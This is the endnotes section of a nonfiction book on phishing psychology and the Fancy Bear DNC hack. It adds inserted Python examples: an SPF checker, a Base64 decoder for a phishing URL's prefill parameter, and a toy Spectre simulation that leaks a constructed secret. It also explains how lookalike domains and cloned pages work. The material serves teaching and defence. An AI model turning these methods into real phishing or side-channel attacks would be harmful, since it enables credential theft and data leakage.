born into a family: A. Tversky and D. Kahneman, “Subjective Probability: A Judgment of Representativeness,” in Kahneman, et al., Judgment under Uncertainty, 34.
Representativeness Heuristic: “A person who follows this heuristic evaluates the probability of an uncertain event, or a sample, by the degree to which it is: (i) similar in essential characteristics to its parent population; and (ii) reflects the salient features of the process by which it is generated”: Tversky and Kahneman, “Subjective Probability,” 33.
legitimate Gmail security alert: See example at https://github.com/anitab-org/mentorship-backend/issues/233.
fraudulent and dangerous: Emma J. Williams and Danielle Polage, “How Persuasive Is Phishing Email? The Role of Authentic Design, Influence and Current Events in Email Judgements,” Behavior & Information Technology 38, no. 2 (2019): 184–97.
John Mulaney: Video clip at https://www.youtube.com/watch?v=ButlizwQXnU.
sent the email: ThreatConnect Research Team, “Does a Bear Leak in the Woods,” ThreatConnect Insights (blog), August 12, 2016, https://threatconnect.com/blog/does-a-bear-leak-in-the-woods/.
put any email address: While basic email protocols allow for spoofing, there are additional protocols—such as Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting, and Conformance (DMARC)—that can help email providers considerably reduce spoofing. See Scott Rose et al., “Trustworthy Email,” NIST Special Publication 800-177, September 2016, https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-177.pdf.
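How a receiving mail server uses SPF to reject a spoofed envelope sender, shown as an added example that is not from the book or from NIST SP 800-177. The domains and addresses are constructed (documentation ranges and made-up names), and DNS is replaced by an in-memory table; only the ip4, ip6, include and all mechanisms of RFC 7208 are modelled.

```python
import ipaddress

# Constructed stand-in for DNS TXT lookups; documentation-range addresses and
# made-up domains, not real SPF records.
FAKE_DNS_TXT = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mail-provider.example -all",
    "_spf.mail-provider.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
}

# SPF qualifiers and the result each produces when its mechanism matches.
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(domain, sender_ip, txt_lookup=FAKE_DNS_TXT, depth=0):
    """Return the SPF result for mail whose envelope sender claims `domain`.

    Supports the ip4, ip6, include and all mechanisms; anything else
    (a, mx, exists, redirect=) yields "permerror" because this toy has no
    resolver for it. Result names follow RFC 7208.
    """
    if depth > 10:                       # RFC 7208 caps DNS-mechanism recursion
        return "permerror"
    record = txt_lookup.get(domain.lower())
    terms = record.split() if record else []
    if not terms or terms[0].lower() != "v=spf1":
        return "none"                    # the domain publishes no SPF policy
    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        qualifier = "+"                  # an unqualified mechanism means "pass"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            matched = True
        elif name in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)
            matched = ip.version == net.version and ip in net
        elif name == "include":
            # include: matches only when the referenced domain's policy says "pass"
            matched = check_spf(arg, sender_ip, txt_lookup, depth + 1) == "pass"
        else:
            return "permerror"
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"                     # no mechanism matched and no "all" term


if __name__ == "__main__":
    for sender in ("192.0.2.77", "198.51.100.10", "2001:db8::1", "203.0.113.5"):
        print(sender, "->", check_spf("example.com", sender))
```

A mail server that sees "fail" for a message claiming to be from example.com can reject it outright; "softfail" is usually treated as a signal for spam scoring rather than rejection. SPF alone only checks the envelope sender, which is why DKIM (a signature over the message) and DMARC (which ties SPF/DKIM results to the visible From: header and tells receivers what to do on failure) are layered on top.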
Google domain name: Because of trademark disputes, some users in the U.K. and Germany have googlemail email addresses. See Andy B, “Change to Gmail from Google Mail,” July 21, 2016, https://support.google.com/mail/forum/AAAAK7un8RUvxxPMMv5kXg/?hl=en&gpf=%23!topic%2Fgmail%2FvxxPMMv5kXg%3Bcontext-place%3Dforum%2Fgmail.
“word starts with a K”: Amos Tversky and Daniel Kahneman, “Availability: A Heuristic for Judging Frequency and Probability,” Cognitive Psychology 5 (1973): 211.
Availability Heuristic: In another Kahneman and Tversky experiment, participants listened to lists of names containing either nineteen famous women and twenty less famous men or nineteen famous men and twenty less famous women. Participants were then asked to estimate whether male or female names were more frequent on the list. The majority of the participants chose the wrong answer. In the first list, they judged the nineteen famous women as more frequent, whereas in the second list they judged the nineteen famous men as more frequent. The participants seemed to have linked frequency of gender to availability in memory, where availability in memory was more closely linked to the fame of the people listed. Tversky and Kahneman, “Availability,” 220–21.
two dozen legislators: Rafael Satter, Jeff Donn, and Justin Myers, “Russian Hackers Pursued Putin Foes, Not Just US Democrats,” November 2, 2017, https://apnews.com/3bca5267d4544508bb523fa0db462cb2/Hit-list-exposes-Russian-hacking-beyond-US-elections.
The Wall Street Journal: Margaret Coker and Paul Sonne, “Ukraine: Cyberwar’s Hottest Front,” The Wall Street Journal, November 9, 2015.
natural disasters and infectious diseases: Phil Muncaster, “#COVID19 Drives Phishing Emails Up 667% in Under a Month,” March 26, 2020, InfoSecurity Magazine, https://www.infosecurity-magazine.com/news/covid19-drive-phishing-emails-667/.
Affect Heuristic: Paul Slovic, Melissa L. Finucane, Ellen Peters, and Donald G. MacGregor, “The Affect Heuristic,” European Journal of Operational Research 177 (2007): 1333–52.
downplay its benefits: The Affect Heuristic works partially through the Availability Heuristic. The more you like something, the more likely its benefits will be available to you in memory. Conversely, the more available an event is in memory, the greater the affect experienced. For the relation between these two heuristics, see Thorsten Pachur et al., “How Do People Judge Risks: Availability Heuristic, Affect Heuristic, or Both?,” Journal of Experimental Psychology: Applied 18, no. 3 (2012): 314–30.
an urn: Dale T. Miller, William Turnbull, and Cathy McFarland, “When a Coincidence Is Suspicious: The Role of Mental Simulation,” Journal of Personality and Social Psychology 57 (1989): 581–89; Lee A. Kirkpatrick and Seymour Epstein, “Cognitive-Experiential Self-Theory and Subjective Probability: Evidence for Two Conceptual Systems,” Journal of Personality and Social Psychology 63 (1992): 534–44; Daniel Kahneman, Thinking, Fast and Slow (New York: Farrar, Straus and Giroux, 2011), 328–29.
“inversely correlated”: A. S. Alhakami and P. Slovic, “A Psychological Study of the Inverse Relationship between Perceived Risk and Perceived Benefit,” Risk Analysis 14 (1994): 1085–96.
time pressure: Melissa L. Finucane, Ali Alhakami, Paul Slovic, and Stephen M. Johnson, “The Affect Heuristic in Judgments of Risks and Benefits,” Journal of Behavioral Decision Making 13 (2000): 5.
Nigerian Astronaut: Katharine Trendacosta, “Here’s the Best Nigerian Prince Email Scam in the Galaxy,” Gizmodo, February 12, 2016, https://gizmodo.com/we-found-the-best-nigerian-prince-email-scam-in-the-gal-1758786973.
“loss averse”: Amos Tversky and Daniel Kahneman, “Loss Aversion in Riskless Choice: A Reference-Dependent Model,” The Quarterly Journal of Economics, November 1991. Jack and Jill example from Kahneman, Thinking, Fast and Slow, 275.
promise gains: Teodor Sommestad and Henrik Karlzén, “A Meta-Analysis of Field Experiments on Phishing Susceptibility” (2019 APWG Symposium on Electronic Crime Research [eCrime]).
inherent ridiculousness: Cormac Herley, “Why Do Nigerian Scammers Say They Are from Nigeria?,” Microsoft, www.microsoft.com/en-us/research/wp-content/uploads/2016/02/WhyFromNigeria.pdf.
Billy Rinehart clicked: Another factor that should be mentioned is that legitimate websites constantly train people to click on links in emails for security reasons.
approximately 10 percent for IT: Flexera 2022 State of Tech Spend Pulse Report, https://info.flexera.com/FLX1-REPORT-State-of-Tech-Spend.
24 percent of that on security: Hiscox Cyber Readiness Report 2022, https://www.hiscox.com/documents/Hiscox-Cyber-Readiness-Report-2022.pdf.
Our browsers couldn’t care less: The human reliance on visual cues in recognition is so pronounced that it is the main way in which CAPTCHA detects bots. CAPTCHA is a reverse Turing Test. Instead of a computer trying to convince a human that it’s a human, CAPTCHA makes the human convince the computer that it’s a human. Computers identify humans by measuring the accuracy of their visual identification skills.
parent company of Google: Security certificates are difficult to forge because they are digitally signed by the holder and the certification authority.
vouch for the identities: Some certification authorities, such as Let’s Encrypt, merely attest that the holder of the certificate controls, rather than owns, the website in question. Nor do they verify identity.
bankruptcy later in the week: For an excellent description and analysis of the DigiNotar hack, see Josephine Wolff, You’ll See This Message When It Is Too Late: The Legal and Economic Aftermath of Cybersecurity Breaches (Cambridge, MA: MIT Press, 2018), 81–100.
HTTP pages are “not secure”: Christopher Boyd, “Chrome Casts Away the Padlock—Is It Good Riddance or Farewell?,” MalwareBytes Labs, August 4, 2021, https://blog.malwarebytes.com/privacy-2/2021/08/chrome-casts-away-the-padlock-is-it-good-riddance-or-farewell/.
not “accounts-google”: “In mid-2015, CTU researchers discovered TG-4127 using the accoounts-google.com domain in spear-phishing attacks targeting Google Account users. The domain was used in a phishing URL submitted to Phishtank, a website that allows users to report phishing links”: https://www.secureworks.com/research/threat-group-4127-targets-google-accounts.
a real password-reset page: Cloning a web page is extremely simple. Your browser has the web page file, and therefore all the information needed to re-create the page. Some free utilities on the web, such as HTTrack, allow users to download a website from the internet to a local directory and recursively build all directories on their local computer.
prefilled web form: The URL also contained Billy Rinehart’s email address and username encoded in a format known as Base 64. Thus, when accoounts-google.com sent the request to the fake website, the resulting web page would present a form already completed with the user’s information: https://climateaudit.org/2018/03/24/attribution-of-2015-6-phishing-to-apt28/. Base 64 converts three octet (eight-bit) characters into four Base 64 (six-bit) ones. For example, to encode the English word Man in Base 64, we take the ASCII value of M (77), a (97), and n (110). We then convert the decimal values to binary and join them together: 01001101 01100001 01101110. If we group this binary sequence according to six bits, instead of eight bits, we get 010011 010110 000101 101110. Converting back to decimal, we get 19, 22, 5, and 46. Looking those up as positions in the Base 64 alphabet (A–Z, a–z, 0–9, +, /), we get T, W, F, and u. Thus, TWFu is the Base 64 encoding of Man.
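The bit-regrouping described above, carried through in code as an added example (not from the book or any of its sources). It also handles the case the note does not show, input whose length is not a multiple of three, which is where the “=” padding comes from, and it decodes a Base 64 query parameter of the kind the note describes. The URL, the parameter name `u` and the address alice@example.com are constructed for the example.

```python
import base64  # standard library, used only to cross-check the hand-written version
from urllib.parse import parse_qs, urlparse

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def b64_encode(data: bytes) -> str:
    """Encode bytes as the note describes: each three 8-bit octets become
    four 6-bit groups, and each group is a position in the 64-symbol alphabet."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        # Join the (up to three) octets into one bit string, e.g. "Man" ->
        # 01001101 01100001 01101110, then pad with zero bits to a multiple of six.
        bits = "".join(f"{b:08b}" for b in chunk)
        bits += "0" * (-len(bits) % 6)
        for j in range(0, len(bits), 6):
            out.append(B64_ALPHABET[int(bits[j:j + 6], 2)])
        # A final chunk of one or two octets yields two or one '=' pad characters.
        out.append("=" * (3 - len(chunk)))
    return "".join(out)


def b64_decode(text: str) -> bytes:
    """Reverse the process: 6-bit groups back into 8-bit octets; the leftover
    zero bits introduced by padding are dropped."""
    symbols = text.rstrip("=")
    bits = "".join(f"{B64_ALPHABET.index(c):06b}" for c in symbols)
    nbytes = len(bits) // 8          # fewer than 8 trailing bits are padding
    return bytes(int(bits[k * 8:(k + 1) * 8], 2) for k in range(nbytes))


def matches_stdlib(data: bytes) -> bool:
    """Cross-check: our encoder agrees with the standard library and round-trips."""
    return (b64_encode(data) == base64.b64encode(data).decode("ascii")
            and b64_decode(b64_encode(data)) == data)


def prefill_from_url(url: str) -> str:
    """Recover the address a lookalike page would use to prefill its form.
    Parameter name 'u' and the URL layout are assumptions for this example."""
    params = parse_qs(urlparse(url).query)
    return b64_decode(params["u"][0]).decode("utf-8")


# Constructed example URL of the kind the note describes (not the real one).
CONSTRUCTED_URL = "https://lookalike.example/reset?u=" + b64_encode(b"alice@example.com")

if __name__ == "__main__":
    print(b64_encode(b"Man"), b64_encode(b"Ma"), b64_encode(b"M"))
    print(prefill_from_url(CONSTRUCTED_URL))
```

Because Base 64 is an encoding rather than encryption, anything placed in a URL this way is readable by whoever sees the link; for a defender, decoding such parameters in proxy or mail-gateway logs is a quick way to see which accounts a phishing campaign was aimed at.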
Turing’s physicality principle: “According to my definition, a number is computable if its decimal can be written down by a machine.” Alan Turing, “On Computable Numbers with an Application to the Entscheidungsproblem,” Proceedings of the London Mathematical Society, 1936, 230.
compute the correct answer: Here’s a simple example. Suppose you wanted to know whether a string of numbers has three 1s in it. Feed a tape with the string into your Turing Machine. The machine begins in state 0 with its head over the left end of the tape. It scans the square. If it finds a 1, it moves the head to the right and switches to state 1. If it doesn’t, it moves right and stays in state 0. If the head scans another 1, it moves right again and enters state 2; otherwise, it moves right and stays in state 1. If the head scans another 1, it prints Y, enters the final state, and halts. Otherwise, the head continues scanning for a third 1. If the head hits the right end of the tape before finding it, it prints N, enters the final state, and halts.
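The machine described in the note, written out as a transition table and a simulator. This is an added example, not from the book; it generalises the note’s machine from “three 1s” to “k 1s”, with the note’s version being k = 3. As in the note, the head starts at the left end in state 0, only ever moves right, writes Y over the k-th 1 or N on the blank square past the end, and then halts.

```python
HALT = "halt"
BLANK = "_"   # the square just past the right end of the input


def count_ones_machine(k: int) -> dict:
    """Transition table for the note's machine, generalised to k ones.

    Keys are (state, scanned symbol); values are (symbol to write, next state).
    The head always moves right, so the move is implicit. State i means
    "i ones seen so far".
    """
    table = {}
    for state in range(k):
        table[(state, "0")] = ("0", state)            # not a 1: stay in this state
        table[(state, BLANK)] = ("N", HALT)           # ran off the end: answer N
        if state < k - 1:
            table[(state, "1")] = ("1", state + 1)    # count this 1
        else:
            table[(state, "1")] = ("Y", HALT)         # k-th 1 found: answer Y
    return table


def run(table: dict, input_tape: str):
    """Run from state 0 with the head over the leftmost square.
    Returns (answer, final tape contents, number of steps taken)."""
    tape = list(input_tape) + [BLANK]   # one blank square past the input
    head, state, steps = 0, 0, 0
    while state != HALT:
        symbol = tape[head]
        if (state, symbol) not in table:
            raise ValueError(f"no transition for state {state} reading {symbol!r}")
        write, state = table[(state, symbol)]
        tape[head] = write
        head += 1          # this machine only ever moves right
        steps += 1
    final = "".join(tape)
    return ("Y" if "Y" in final else "N"), final, steps


def has_three_ones(bits: str) -> str:
    """Exactly the machine in the note: does the string contain three 1s?"""
    return run(count_ones_machine(3), bits)[0]


if __name__ == "__main__":
    for tape in ("1011", "0110", ""):
        print(repr(tape), "->", run(count_ones_machine(3), tape))
```

The point of writing it out is that nothing in the table refers to the question being asked; the “program” is just a lookup from (state, symbol) to (symbol, state), and the same simulator runs any such table.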
before it is needed: Speculative execution attacks are a class of side-channel attacks that exploit our desire for efficiency in computing, and in decision-making more generally. Imagine parents and children debating how to spend their Saturday. If the parents wake up before the kids, they can spend some time looking at which movies are playing at the local theater. Later, they ask the kids whether they’d like to see one. The kids say yes, and the parents act on the information they gathered earlier. So long as the parents are good at predicting what their kids will choose, they save time on average. The same is true of speculative execution in CPUs. So long as the CPU’s predictions about which way a branch will go are reasonably accurate, it is more efficient to start executing the predicted instructions before confirming that the branch actually goes that way. Speculative execution attacks work by tricking the CPU into fetching sensitive data down a mispredicted path; the CPU later discards the results of that path, but traces of the fetch remain in the cache, from which an attacker can extract the data. Two speculative execution attacks are particularly notable: 1) Spectre: Spectre tricks a victim program into speculatively reading memory that a bounds check or other security check should have kept it from reading. During the speculation, the CPU copies the contents of that memory from RAM into the cache on the CPU. Caching boosts efficiency, since reading the cache is much faster than reading RAM, like going to your refrigerator for food instead of the store. When the CPU resolves the check and discovers the misprediction, it throws away the speculative results, so the program never officially receives the sensitive value. However, the cache line the speculation pulled in remains cached. Attackers use timing measurements to deduce which line is there, and so what the value was. (The food is still in the refrigerator even though you stole it from the store.) Paul Kocher et al., “Spectre Attacks: Exploiting Speculative Execution,” 40th IEEE Symposium on Security and Privacy (2019); 2) Meltdown: Meltdown functions similarly; it maliciously leaves a trace of secret content in the cache and uses a side channel to deduce the content. While Spectre exploits branch prediction, Meltdown takes advantage of the fact that some CPUs check the permissions on a memory access at the same time as, rather than before, they read the data. In other words, the CPU asks permission to read a piece of information as it is reading it. Once the permission check fails, the CPU raises an exception and prevents the program from receiving the data. However, instructions that depended on the forbidden value have already run transiently and copied a trace of it into the cache. From there, the attacker uses a timing side channel to recover it. Unlike Spectre, Meltdown reads kernel memory directly from an unprivileged process, in principle allowing it to read everything the kernel has mapped (the name refers to the melting of the border between protected and unprotected memory). Moritz Lipp et al., “Meltdown: Reading Kernel Memory from User Space,” 27th USENIX Security Symposium (2018).
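A toy model of the Spectre sequence described above: train the branch predictor, flush the cache, trigger an out-of-bounds read that the CPU later squashes, then probe which cache line came back. This is an added simulation, not code from the Kocher or Lipp papers and not a working exploit: the “CPU” is a Python class, the cache is a set of line numbers, the timing measurement is replaced by a membership test, and the memory layout and the secret are constructed. It shows only the point the note makes, that the architectural rollback leaves the cache line behind.

```python
"""Toy model of a Spectre (bounds-check bypass) read.

Simulation only: the cache is a set of line numbers and "reload timing" is a
membership test. No real CPU, cache or timer is involved.
"""
from dataclasses import dataclass, field

LINE = 64  # bytes per cache line; the probe array uses one line per possible byte value


@dataclass
class ToyCPU:
    memory: bytearray
    cache: set = field(default_factory=set)  # microarchitectural state: which lines are resident
    last_branch: bool = True                 # one-bit predictor: guess the outcome seen last time

    def load(self, addr: int) -> int:
        """Every load, speculative or not, pulls its line into the cache."""
        self.cache.add(addr // LINE)
        return self.memory[addr]

    def flush(self) -> None:
        self.cache.clear()

    def is_cached(self, addr: int) -> bool:
        return addr // LINE in self.cache

    def victim(self, x: int, a1: int, a1_size: int, a2: int):
        """The gadget  if (x < a1_size) y = a2[a1[x] * LINE];  with speculation modelled.

        The predictor guesses before the comparison resolves. If it guesses
        "in bounds" for an out-of-bounds x, both loads run anyway; the result is
        then squashed (None is returned) but the lines they touched stay cached.
        """
        in_bounds = x < a1_size
        predicted_in_bounds = self.last_branch
        self.last_branch = in_bounds          # the predictor learns the true outcome
        if predicted_in_bounds or in_bounds:  # speculative path, or the correct path after recovery
            value = self.load(a1 + x)
            self.load(a2 + value * LINE)      # encodes `value` as which probe line is now cached
            if in_bounds:
                return value                  # visible to the program only when the check passes
        return None                           # misprediction squashed; cache residue remains


def build_victim():
    """Constructed layout: a 16-byte array, a secret right after it, a probe array far away."""
    a1, a1_size = 0, 16
    a2 = 4096
    mem = bytearray(a2 + 256 * LINE)
    mem[a1:a1 + a1_size] = bytes(range(a1_size))
    secret = b"hunter2"                        # constructed secret; never returned by victim()
    mem[a1 + a1_size:a1 + a1_size + len(secret)] = secret
    return ToyCPU(mem), a1, a1_size, a2, len(secret)


def leak_byte(cpu: ToyCPU, a1: int, a1_size: int, a2: int, offset: int):
    """One Spectre round: train, flush, mispredicted out-of-bounds access, reload-probe."""
    for i in range(a1_size):                   # training: in-bounds calls teach "check passes"
        cpu.victim(i, a1, a1_size, a2)
    cpu.flush()                                # FLUSH: evict every probe line
    architectural = cpu.victim(offset, a1, a1_size, a2)   # out of bounds; predictor still says in
    hits = [b for b in range(256) if cpu.is_cached(a2 + b * LINE)]   # RELOAD: the one warm line
    return architectural, hits


def leak_secret() -> bytes:
    """Recover the whole secret byte by byte; the victim never returns any of it."""
    cpu, a1, a1_size, a2, n = build_victim()
    out = bytearray()
    for off in range(a1_size, a1_size + n):
        architectural, hits = leak_byte(cpu, a1, a1_size, a2, off)
        if architectural is not None or len(hits) != 1:
            raise RuntimeError("model broke: expected no architectural result and one warm line")
        out.append(hits[0])
    return bytes(out)


if __name__ == "__main__":
    print(leak_secret())                        # b'hunter2'
```

Each call to `victim` with an out-of-bounds index returns None, exactly as the bounds check intends, yet `leak_secret` reconstructs the bytes behind the array from which probe line is warm. Real attacks replace the membership test with a timed read of each probe line and must deal with noise, prefetchers and predictor training that is far less obliging than this one-bit model.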
to conserve resources: “Almost any optimization that you can think of that makes your best case run a little faster, leaves the worst case the same, leaves some kind of side channel in between.” Paul Kocher, “Spectre Attacks: Exploiting Speculative Execution,” 40th IEEE Symposium on Security and Privacy (2019), https://www.youtube.com/watch?v=zOvBHxMjNls at 2:12.
high-value: For the difficulties of securing a political campaign, see Sunny Consolvo et al., “‘Why Wouldn’t Someone Think of Democracy as a Target?’: Security Practices and Challenges of People Involved with U.S. Political Campaigns,” Proceedings of the USENIX Security Symposium (2021).
Three days before Fancy Bear phished: United States of America v. Viktor Borisovich Netyksho, Boris Alekseyevich Antonov, Dmitriy Sergeyevich Badin, Ivan Sergeyevich Yermakov, Aleksey Viktorovich Lukashev, Sergey Aleksandrovich Morgachev, Nikolay Yuryevich Kozachek, Pavel Vyacheslavovich Yershov, Artem Andreyevich Malyshev, Aleksandr Vladimirovich Osadchuk, Aleksey Aleksandrovich Potemkin, and Anatoliy Sergeyevich Kovalev, Defendants, Case 1:18-cr-00215-ABJ, July 13, 2018, 6, https://www.justice.gov/file/1080281/download.
Charles Delavan: Charles Delavan, “Re: Someone Has Your Password—March 19, 2016,” WikiLeaks, https://web.archive.org/web/20220122033133/https://wikileaks.org/podesta-emails/emailid/36355.
fifty thousand emails in all: United States of America v. Defendants, 6.
In his defense: Eric Lipton, David E. Sanger, and Scott Shane, “The Perfect Weapon: How Russian Cyberpower Invaded the U.S.,” The New York Times, December 13, 2016.
Delavan responded in Slate: Will Oremus, “‘Is This Something That’s Going to Haunt Me the Rest of My Life?’: What It’s Like to Be the IT Guy Who Accidentally Helped Russia (Maybe) Hack the Election,” Slate, December 14, 2016, https://slate.com/technology/2016/12/an-interview-with-charles-delavan-the-it-guy-whose-typo-led-to-the-podesta-email-hack.html.
Dmitri Alperovitch, co-founder: Vicky Ward, “The Russian Émigré Leading the Fight to Protect America,” Esquire, December 1, 2016, https://www.esquire.com/news-politics/a49902/the-russian-emigre-leading-the-fight-to-protect-america.
SNAKEMACKEREL: Accenture Security, “SNAKEMACKEREL: Threat Campaign Likely Targeting NATO Members, Defense and Military Outlets,” Accenture, 2019, https://www.accenture.com/_acnmedia/pdf-94/accenture-snakemackerel-threat-campaign-likely-targeting-nato-members-defense-and-military-outlets.pdf. Saying which firm is responsible for which name can be tricky. First, since hacking groups are discovered independently, firms may lack the evidence to conclude that they are talking about the same group. Second, given the churn in the industry over the past decade, the names of the firms have changed. Thus, APT 28 appears to have been the name given by FireEye (now Trellix). FireEye had owned Mandiant, but since 2021 they are separate again. APT 28 is now identified with Mandiant.
“badass guys who act”: Anton Troianovski and Ellen Nakashima, “How Russia’s Military Intelligence Agency Became the Covert Muscle in Putin’s Duels with the West,” The Washington Post, December 28, 2018.
brazen poisoning of Sergei Skripal: Richard Pérez-Peña and Ellen Barry, “U.K. Charges 2 Men in Novichok Poisoning, Saying They’re Russian Agents,” The New York Times, September 5, 2018.
“My father died”: “Chief Scout Reports,” Rossiyskaya Gazeta, Moscow, December 20, 2005, https://web.archive.org/web/20070325133406/http://svr.gov.ru/smi/2005/rosgaz20051220.htm.
“We saw that the FSB”: Roland Oliphant, “What Is Unit 26165, Russia’s Elite Military Hacking Centre?,” The Telegraph, October 4, 2018.
future in computer hacking: Unit 26165 has helped design the curriculum at Nina Loguntsova’s school and at least six others in Moscow in recent years, as “cooperation agreements” posted on the schools’ websites show: Troianovski and Nakashima, “How Russia’s Military Intelligence Agency.”
“problems with the law”: “What Is the GRU?” Meduza, November 6, 2018, https://meduza.io/en/feature/2018/11/06/what-is-the-gru-who-gets-recruited-to-be-a-spy-why-are-they-exposed-so-often.
southwest of the Kremlin: Oddly, Unit 26165 can be found under that address in the online Unified State Register of Legal Entities, https://www.rusprofile.ru/egrul?ogrn=1097746760836.
Kill Chain: Eric M. Hutchins, Michael J. Cloppert, and Rohan M. Amin, “Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains,” Lockheed Martin Corporation, https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf. The terminology used in the text fits the Varonis model most closely: Sarah Hospelhorn, “What Is the Cyber Kill Chain and How to Use It Effectively,” Varonis, https://www.varonis.com/blog/cyber-kill-chain/. For an alternative model, see “ATT&CK for Enterprise Introduction,” Mitre, https://attack.mitre.org/tactics/enterprise/.
“speaking indictment”: Unfortunately, the evidence gathered by Mueller and presented to a grand jury in Washington, DC, to substantiate these allegations has been redacted due to its highly classified nature.
Fancy Bear prepared: United States of America v. Defendants, 4–6.
The twenty-five-year-old: “Aleksey Viktorovich Lukashev,” Most Wanted, FBI, https://www.fbi.gov/wanted/cyber/aleksey-viktorovich-lukashev.
From publicly available: Secureworks Counter Threat Unit, “Threat Group–4127 Targets Hillary Clinton Presidential Campaign,” Secureworks, June 16, 2016, https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign.
On the morning of: Raphael Satter, Jeff Donn, and Chad Day, “Inside Story: How Russians Hacked the Democrats’ Emails,” AP News, November 4, 2017, https://apnews.com/article/hillary-clinton-phishing-moscow-russia-only-on-ap-dea73efc01594839957c3c9a6c962b8a.
He inserted the newly: United States of America v. Defendants, 13. The account had been registered with dirbinsaabol@mail.com.
The test must have: Raphael Satter (@razhael), “Now Look at March 10, 2016,” Twitter, July 13, 2018, https://twitter.com/razhael/status/1017897983558455297.
Nevertheless: Terry Sweeney, “Clinton Campaign Tested Staffers with Fake Phishing Emails,” Dark Reading, February 15, 2017, https://www.darkreading.com/attacks-breaches/clinton-campaign-tested-staffers-with-fake-phishing-emails/d/d-id/1328177.
Lukashev tried again four days later: Raphael Satter (@razhael), “Skip Forward to March 15, 2016,” Twitter, July 13, 2018, https://twitter.com/razhael/status/1017900690633523200.
Yermakov, a thirty-year-old, baby-faced hacker: “Ivan Sergeyevich Yermakov,” Most Wanted, FBI, https://www.fbi.gov/wanted/cyber/ivan-sergeyevich-yermakov.
Yermakov’s tasks were: United States of America v. Defendants, 8.
On March 19: Raphael Satter (@razhael), “Lets Go Now to March 19, 2016,” Twitter, July 13, 2018.
The shortened URL: Satter, Donn, and Day, “Inside Story.”
These emails targeted: Satter, Donn, and Day, “Inside Story.”
The next day, Yermakov scanned: United States of America v. Defendants, 8.
On April 15: United States of America v. Defendants, 10.
Mudge, a well-known hacker: Peiter “Mudge” Zatko (@dotmudge), “So … I Suppose It’s Time to Share a Bit,” Twitter, July 14, 2018, https://twitter.com/dotMudge/status/1017949169619595264. On Mudge, see Joseph Menn, Cult of the Dead Cow (New York: Public Affairs, 2019); Kim Zetter, “A Famed Hacker Is Grading Thousands of Programs—and May Revolutionize Software in the Process,” The Intercept, July 29, 2016, https://theintercept.com/2016/07/29/a-famed-hacker-is-grading-thousands-of-programs-and-may-revolutionize-software-in-the-process/.
At Fancy Bear, reconnaissance: United States of America v. Defendants, 7.
Lieutenant Colonel: United States of America v. Defendants, 4.
is a cross-platform: Tiberius Axinte and Bogdan Botezatu, “A Post-Mortem Analysis of Trojan.MAC.APT28-XAgent,” in Bitdefender: Dissecting the APT28 Mac OS X Payload, 2015, https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf.
Lieutenant Captain Nikolay Kozachek: United States of America v. Defendants, 4.
He included his handle: In the project path: Users/kazak/Desktop/Project/XAgentOSX. Axinte and Botezatu, “Post-Mortem Analysis,” 6.
Second Lieutenant Artem Malyshev: United States of America v. Defendants, 5, 8–9.
To mask the traffic: United States of America v. Defendants, 9–10. On April 19 and 20, 2016.
from someone who accepts: Bitcoin is not legal tender (yet), so no one is obligated to accept it.
On March 22: “Rebooting Watergate: Tapping into the Democratic National Committee,” ThreatConnect, Intelligence-Driven Security Operations, June 17, 2016, https://web.archive.org/web/20221001000000*/https://threatconnect.com/blog/tapping-into-democratic-national-committee/.
in the domain name: MIS stands for Management Information Systems.
On April 22: “Interview of Shawn Henry,” Interview by Executive Session, Permanent Select Committee on Intelligence, U.S. House of Representatives, Washington, DC, December 5, 2017, 32, https://intelligence.house.gov/uploadedfiles/sh21.pdf.
Four days later: Mikayla Bouchard and Emily Cochrane, “How We Got Here: A Timeline of Events Leading Up to the Charges,” The New York Times, October 30, 2017.
Supreme Court ruled unanimously: United States v. U.S. District Court, 407 U.S. 297 (1972), commonly known as the “Keith” case, after the presiding District Court judge.
On Friday, September 25: “CrowdStrike’s Work with the Democratic National Committee: Setting the Record Straight,” From the Front Lines, CrowdStrike, June 5, 2020, https://www.CrowdStrike.com/blog/bears-midst-intrusion-democratic-national-committee/.
He asked for the computer security department: “Interview of Yared Tamene Wolde-Yohannes,” Interview by Executive Session, Permanent Select Committee on Intelligence, U.S. House of Representatives, Washington, DC, August 30, 2017, 7, https://www.odni.gov/files/HPSCI_Transcripts/Yareda_Tamene-MTR_Redacted.pdf.
not a security specialist: Hawkins identified himself to Tamene as an FBI agent. Tamene asked for verification, but was unconvinced by the response. Lipton, Sanger, and Shane, “Perfect Weapon.”
Hawkins didn’t inform Tamene: “Interview of Yared Tamene Wolde-Yohannes,” 8.
The FBI had been aware: “CrowdStrike’s Work with the Democratic National Committee.”
“exquisite access”: Raphael Satter and Mike Corder, “Dutch Spies Caught Russian Hackers on Tape,” January 26, 2018, apnews.com/article/hacking-elections-international-news-security-services-technology-ef3b036949174a9b98d785129a93428.
Hawkins divulged little: “Interview of Yared Tamene Wolde-Yohannes,” 8. Hawkins added that Tamene should do the investigation stealthily, so as not to tip off the hackers about their suspicions.
“The FBI thinks”: Lipton, Sanger, and Shane, “Perfect Weapon.”
nothing about it: Lipton, Sanger, and Shane, “Perfect Weapon.”
After the conversation with Hawkins: “Interview of Yared Tamene Wolde-Yohannes,” 8–9.
He described his initial threat level: “Interview of Yared Tamene Wolde-Yohannes,” 11.
